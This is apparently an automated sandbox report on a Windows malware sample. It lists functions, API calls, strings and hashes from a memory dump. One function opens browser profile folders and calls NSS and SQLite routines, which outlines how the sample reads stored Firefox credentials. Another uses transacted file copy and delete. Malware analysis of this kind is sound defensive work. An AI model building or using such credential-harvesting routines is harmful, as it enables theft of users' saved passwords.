GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004629C0,00000000,00000000,?), ref: 00462C4F

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d424335f64e28dbcdcee87eee48c0e8f8863f139a4d694322cec1c8b80a45ad6
Instruction ID: a69f90c8d9d38a3dd937ea4e62a83cd673957c6b1ce9293f351160b58d10c302
Opcode Fuzzy Hash: d424335f64e28dbcdcee87eee48c0e8f8863f139a4d694322cec1c8b80a45ad6
Instruction Fuzzy Hash: 94F0F932A009137BEB245A61CE45BBF7B58EB40355F14442AEC02A3240FABCFD41C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0046258C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
Part of subcall function 004571CB: _free.LIBCMT ref: 00457263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0

Strings

utf8, xrefs: 0046254F
0&G, xrefs: 00462408

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: 0&G$utf8
API String ID: 2003897158-2116212543
Opcode ID: baa68ca91bddc46cd499e0e5059263a9408ec52ec63f7120597c0508089360f4
Instruction ID: 2cc157241e3020f81b59ad1cb66ad8fdfb3320e9df6087c07224aede26a875a4
Opcode Fuzzy Hash: baa68ca91bddc46cd499e0e5059263a9408ec52ec63f7120597c0508089360f4
Instruction Fuzzy Hash: 8DF02832A01105BBD724AB74ED55EBE33ACDB45318F10007FFA02D7281EABCAD058759

Uniqueness

Uniqueness Score: -1.00%

Function 00462719, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

EnumSystemLocalesW.KERNEL32(004629F7,00000001,00000002,?,-00000050,?,00462D96,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00462763

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4c64c37b66b48842290b7bf6991279d2d783927b0e0f57c7383964fc2e696d08
Instruction ID: ace6497e85dc02f5aee632768e4d279fd59aa01d0cd738ba3751b8fdf9a8d65e
Opcode Fuzzy Hash: 4c64c37b66b48842290b7bf6991279d2d783927b0e0f57c7383964fc2e696d08
Instruction Fuzzy Hash: 5BF028763007046FCB245F359881AB67B94EF80359F04443EF9014B690E6F95C02C644

Uniqueness

Uniqueness Score: -1.00%

Function 00458577, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00452551: EnterCriticalSection.KERNEL32(?,?,00453DF7,00000000,00484E90,0000000C,00453DBE,?,?,00458540,?,?,0045736D,00000001,00000364,00000008), ref: 00452560

EnumSystemLocalesW.KERNEL32(0045856A,00000001,00485070,0000000C,00458A49,00000000), ref: 004585AF

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: c8bd6c6404a5ffb51839ad0765aab8f508ba7f1ba7e19109230fb052114a0333
Instruction ID: bd975b07eb74d256c9eb258310aeca0a503a7fc08ac9ff67c2137e3b57904c10
Opcode Fuzzy Hash: c8bd6c6404a5ffb51839ad0765aab8f508ba7f1ba7e19109230fb052114a0333
Instruction Fuzzy Hash: 2DF04472A40204EFE700DFA9E842B5C77B0EB06725F20452FF414E7291DB795904CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00462633, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

EnumSystemLocalesW.KERNEL32(0046258C,00000001,00000002,?,?,00462DF4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0046266A

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d103e07a5380b81aece0e4b7cd7bb1ce75df0e355c626d03c09c3e4d4cbf32a9
Instruction ID: 34286e696306eacaf8ba8f9a882d975dc3cd7aecf62a9ad536f58892c62780d6
Opcode Fuzzy Hash: d103e07a5380b81aece0e4b7cd7bb1ce75df0e355c626d03c09c3e4d4cbf32a9
Instruction Fuzzy Hash: ECF0553A30060567CB149F36D95576A7F94EFC1714B06806AEA068B291E2B9D843C799

Uniqueness

Uniqueness Score: -1.00%

Function 00458BA4, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00456179,?,20001004,00000000,00000002,?,?,00455764), ref: 00458BD8

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4c7ca43d17276366b973f20aa50c3a9bf86f3becbbf06615761dcf39d33e4ca1
Instruction ID: 00937211b2f484656d524a2356035376e32b0c16ae6efd06d943c785aa9bf2b0
Opcode Fuzzy Hash: 4c7ca43d17276366b973f20aa50c3a9bf86f3becbbf06615761dcf39d33e4ca1
Instruction Fuzzy Hash: AEE04875A0011CB7CF122F51DC05E9E3E59FF54752F044029FC0575261CF769D259ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00440CC5, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00040CD1,00440649), ref: 00440CCA

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8beeee68278578a977a58922a0c5611c6b784f3663facc1976e8a805a08aee71
Instruction ID: dba0d05fd5ef83f1c9e8805d8f94acbaeef4457f38b4b366c7732df14f1503c4
Opcode Fuzzy Hash: 8beeee68278578a977a58922a0c5611c6b784f3663facc1976e8a805a08aee71
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041E014, Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction ID: 2b68b11eeb88712b8ce7400ea382997c22786c23b16cca6d2aeda21fdd285ab6
Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction Fuzzy Hash: 7AE11575E002299FCF14CFA9D590AEDBBF5FB88314F2481AAE855E7340D634A9818F54

Uniqueness

Uniqueness Score: -1.00%

Function 004484BA, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
Instruction ID: e946252db305763ed07a346dec792169a84f57976465df867b6f9558783c8005
Opcode Fuzzy Hash: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
Instruction Fuzzy Hash: BC515E71E00119AFEF04CF99C981AAEBBB2EF88304F19805DE915AB341D7389E51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0045A5DD, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
Instruction ID: ffbed51893eee56e5f0a6d5d594a499ec612e4216e0ed18c4b9e673d5f7a457b
Opcode Fuzzy Hash: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
Instruction Fuzzy Hash: D721B673F204394B770CC47E8C532BDB6E1C68C541745423EE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 0045A4BD, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
Instruction ID: d4796199420aa186b6c44f707558acbf23b85472b2e64044f100dbabf6d3acde
Opcode Fuzzy Hash: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
Instruction Fuzzy Hash: B911A723F30C296B675C81698C172BE91D2DBD824430F433BD826E7284F994DE23D294

Uniqueness

Uniqueness Score: -1.00%

Function 0041E857, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
Instruction ID: b08065770aaa3e5024261f6b8f27829de5e14fae179c59a4b636cbd334e7375d
Opcode Fuzzy Hash: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
Instruction Fuzzy Hash: C02169705241B145864C5B3AAC2143BBB919B8721338B42BFED8BDA0D2C52ED5B5D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0045A0B2, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
Instruction ID: 0f35cd1cdfa2507b62c58bdd5256ef98e78387180735e39f6991d5b358c28599
Opcode Fuzzy Hash: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
Instruction Fuzzy Hash: 72F02B32650130DBC726DEAC8909B59739CF705B52F10825BED02E7392CAB8DE48D3CA

Uniqueness

Uniqueness Score: -1.00%

Function 0045A03D, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
Instruction ID: b71f545da49f6d3db7369e6d6598d851a446798c0fa16d89008dba216badf81b
Opcode Fuzzy Hash: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
Instruction Fuzzy Hash: EFF03031621224DBCB26DF8CD845A4973ACEB45B55F11415BE901EB292C6B8DE04C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0045A081, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction ID: 493225b8908fd9986b6f6fb6852177c2f8e07a3ab156e225542957066ff3c255
Opcode Fuzzy Hash: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction Fuzzy Hash: 45E08C32921238EBCB14DF89C94498AF3ECEB84F06B11419BB901E3252C678DE04C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 0045AC3F, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0045AC69
_free.LIBCMT ref: 0045AD42
_free.LIBCMT ref: 0045AD6F

Strings

`,i, xrefs: 0045AC90, 0045ACCF, 0045ACDC, 0045AD13, 0045ADDB, 0045AEE2, 0045AF1F, 0045AF2C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: `,i
API String ID: 3409252457-3133775968
Opcode ID: 72f7766bd6c7a4e625afa66bc020aa8d8d2c4d510056e49694723bc7dd9ab35f
Instruction ID: 2338aeeaa6bad2ea03f777dfb5de80de433cac2dfbd4136913c997d5fa23ffb5
Opcode Fuzzy Hash: 72f7766bd6c7a4e625afa66bc020aa8d8d2c4d510056e49694723bc7dd9ab35f
Instruction Fuzzy Hash: 92D11471904305AFDB20AF659842A6F77E4EF00316F04466FED119B383EB398918CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00422683, Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 432COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422688
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004226AC

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Init.NSS3(?,?,?,?,?,?), ref: 004227B6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

sqlite3_finalize.NSS3(?), ref: 00422C80
sqlite3_close.NSS3(?), ref: 00422C8A
NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00422CC1

Strings

='= , xrefs: 00422BDB
Profiles, xrefs: 004226BE
nt, xrefs: 00422BE4
{`z4, xrefs: 00422B95
., xrefs: 00422B9C
7, xrefs: 00422B17
WKIW, xrefs: 00422A28
#9, xrefs: 00422B57
' t", xrefs: 00422BD4
G, xrefs: 00422A40

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$EnvironmentFolderInitPathShutdownVariable_strcatsqlite3_closesqlite3_finalize
String ID: #9$' t"$.$7$='= $G$Profiles$WKIW$nt${`z4
API String ID: 3790890743-686067381
Opcode ID: 42534139df3980f3c09d0c1e73b9ab828d013ac4abdcd2bedcae31f4574a30a2
Instruction ID: c9ba6cc73b6555bc485a7635afdeff473f944dfaad42a9601cbffc47b3617cf0
Opcode Fuzzy Hash: 42534139df3980f3c09d0c1e73b9ab828d013ac4abdcd2bedcae31f4574a30a2
Instruction Fuzzy Hash: 0612DD30E04298CADF25DBA5C9907EDBBB0AF59304F5041AED40977292EB781E89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00452076, Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004520E5
_free.LIBCMT ref: 004520FB
_free.LIBCMT ref: 0045210E
_free.LIBCMT ref: 00452123
_free.LIBCMT ref: 00452138
GetCPInfo.KERNEL32(?,?), ref: 00452182

Part of subcall function 0045D7C4: _free.LIBCMT ref: 0045D82F

_free.LIBCMT ref: 004523ED
_free.LIBCMT ref: 00452400
_free.LIBCMT ref: 0045240E
_free.LIBCMT ref: 00452419
_free.LIBCMT ref: 0045245B
_free.LIBCMT ref: 00452463
_free.LIBCMT ref: 00452469
_free.LIBCMT ref: 00452471
_free.LIBCMT ref: 0045247F

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: cf4c2ffb721b4b724475d04a849912554015005390b25ca616f0524cd5533d08
Instruction ID: d2e0628ef23e4c9b2675df8823be0be2d1987371ec530bc30c7eab761a6d51e8
Opcode Fuzzy Hash: cf4c2ffb721b4b724475d04a849912554015005390b25ca616f0524cd5533d08
Instruction Fuzzy Hash: B2D1AE719002059FDB11CF79C981BAEBBF5BF0A301F14412FE995A7342DBB8A9498B64

Uniqueness

Uniqueness Score: -1.00%

Function 0044EA63, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB09
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB2D

Strings

<program name unknown>, xrefs: 0044EB37
Expression: , xrefs: 0044EDC3
File: , xrefs: 0044EBD3
Assertion failed!, xrefs: 0044EA87
..., xrefs: 0044EB88, 0044ECA7, 0044ECF9, 0044EE3D, 0044EEC0, 0044EEF3
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0044EE6C
Program: , xrefs: 0044EACB
\, xrefs: 0044EC2A
(Press Retry to debug the application - JIT must be enabled), xrefs: 0044EE96
Line: , xrefs: 0044ED49

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-3261600717
Opcode ID: 65529fed557b786163c570326af70ea110352edf082673693af1aac331673cb2
Instruction ID: cbb005097d3f3b27990ba66f3e62166c6a70d73ee99de89e4c8c3d79c473411f
Opcode Fuzzy Hash: 65529fed557b786163c570326af70ea110352edf082673693af1aac331673cb2
Instruction Fuzzy Hash: 51C10C71E002057AEB24AA26DC85FFF7368EF65708F1440AAFD09D5242F63C9E49CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00424016, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042401B

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

while parsing , xrefs: 00424061
6rkw, xrefs: 00424102, 00424154
unexpected , xrefs: 004241A0
; expected , xrefs: 004241FF
syntax error , xrefs: 00424038
; last read: ', xrefs: 004240F6

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: 6rkw$; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3708980276-377966253
Opcode ID: 7c8d51e9b1850ac692e4e60cdc5c0b143e5c09526f57875c92288af32196542e
Instruction ID: 81074ebcdcb79a76691b02df632c9b039df9ed7aba0e7bb70cb7591c71e232d5
Opcode Fuzzy Hash: 7c8d51e9b1850ac692e4e60cdc5c0b143e5c09526f57875c92288af32196542e
Instruction Fuzzy Hash: C3617F70900208DFCB05EFA5C991BEDFBB4AF58314F54405EE009F7282DBB85A99DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004280D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004280DB

Strings

not key_keep_stack.empty(), xrefs: 004281EF
not keep_stack.empty(), xrefs: 004280FC
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 004281AE
object_element, xrefs: 00428235
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004280EB, 004280FB, 004281AD, 004281EE, 00428230

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
Instruction ID: 02a3948f5721aa9a7a5a529718c8f0f58267128f42a49cbeb15ad061ff2bd8ad
Opcode Fuzzy Hash: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
Instruction Fuzzy Hash: 24510430B01114DFDB04DF65D486BAE7BA5FF45314F84809EE8055B282DB78AC55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00428285, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042828A

Strings

not key_keep_stack.empty(), xrefs: 0042839E
not keep_stack.empty(), xrefs: 004282AB
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 0042835D
object_element, xrefs: 004283E4
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042829A, 004282AA, 0042835C, 0042839D, 004283DF

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 9d4cb45d419ee4620783c0c0cd48349c2460d4bc81323b67cbb79ecffd1d615a
Instruction ID: d86e02c9f3b8653c4ca74c29ae50a8666d7dd5994750ee7d096b894a5484e904
Opcode Fuzzy Hash: 9d4cb45d419ee4620783c0c0cd48349c2460d4bc81323b67cbb79ecffd1d615a
Instruction Fuzzy Hash: 5951F430B001249FCB04EF65D486BAE7BB5FF45314F84809EE8059B292DB79AD54CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428434, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428439

Strings

not key_keep_stack.empty(), xrefs: 0042854D
not keep_stack.empty(), xrefs: 0042845A
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 0042850C
object_element, xrefs: 00428593
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00428449, 00428459, 0042850B, 0042854C, 0042858E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: d028862a6715dafbaf1e244a621cfc67416bdaee1d47a3ad37c64fb3358355c1
Instruction ID: ef96e7c7adb5d8b8a577f56dd21b84160054c2bc9393711002ca6b1764e60304
Opcode Fuzzy Hash: d028862a6715dafbaf1e244a621cfc67416bdaee1d47a3ad37c64fb3358355c1
Instruction Fuzzy Hash: 6251F430B00114AFDB04EF65D486BAE7BA4FF45314F84809EE8059B396DB78ED54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004285E3, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004285E8

Strings

not key_keep_stack.empty(), xrefs: 004286FA
not keep_stack.empty(), xrefs: 00428609
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 004286B9
object_element, xrefs: 00428740
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004285F8, 00428608, 004286B8, 004286F9, 0042873B

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: d3354caba45fd1f1cea50c77a2bf27c00e0c25e015989f75e25a93662e20699f
Instruction ID: ab07ae53d137fbd5d81d814e9ed1350d295043a2f7c009784a1c927ca44db523
Opcode Fuzzy Hash: d3354caba45fd1f1cea50c77a2bf27c00e0c25e015989f75e25a93662e20699f
Instruction Fuzzy Hash: 8651E531B002109FCB04EF65D886BAE7BB5BF45314F94809EE8059B292DB78AD54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00458774, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 004587CB
ext-ms-, xrefs: 004587DF

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 37c81110ed85044dd5aceeaecdd1ea098defe0701216d777ea815dd99649c165
Instruction ID: 0fd8a11ffa56757e8ccf918c2529828d077cd395863ae7d7221dbacfabbe6c1d
Opcode Fuzzy Hash: 37c81110ed85044dd5aceeaecdd1ea098defe0701216d777ea815dd99649c165
Instruction Fuzzy Hash: 8821F672E01211BBCB21AB659C40A1B3658EF05765F25112BED46B7392EE38DC05C5ED

Uniqueness

Uniqueness Score: -1.00%

Function 0042AB86, Relevance: 9.2, APIs: 6, Instructions: 236fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042AB8B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 0042AC96
CloseHandle.KERNEL32(00000000), ref: 0042ACA5
GetFileSize.KERNEL32(00000000,00000000), ref: 0042ACEC
ReadFile.KERNEL32(00000010,00000000,00000000,?,00000000), ref: 0042AD17
CloseHandle.KERNEL32(00000010), ref: 0042AD1E

Part of subcall function 0040B7A7: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
Part of subcall function 0040B7A7: DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
Part of subcall function 0040B7A7: CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID:
API String ID: 604483397-0
Opcode ID: 2abc3d2220224760e5a4e143b90e2a6f8e62220ef53a0d7cb54de1d864932661
Instruction ID: 1e0958ef53f511d795c374f297b53ba487068b5b819034deb9897256c487750a
Opcode Fuzzy Hash: 2abc3d2220224760e5a4e143b90e2a6f8e62220ef53a0d7cb54de1d864932661
Instruction Fuzzy Hash: 7191F130D002589FCF15EFE5D9806EEFBB5AF16304F50809EE445B7252EB780A49CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0041819E, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 421COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004181A3

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

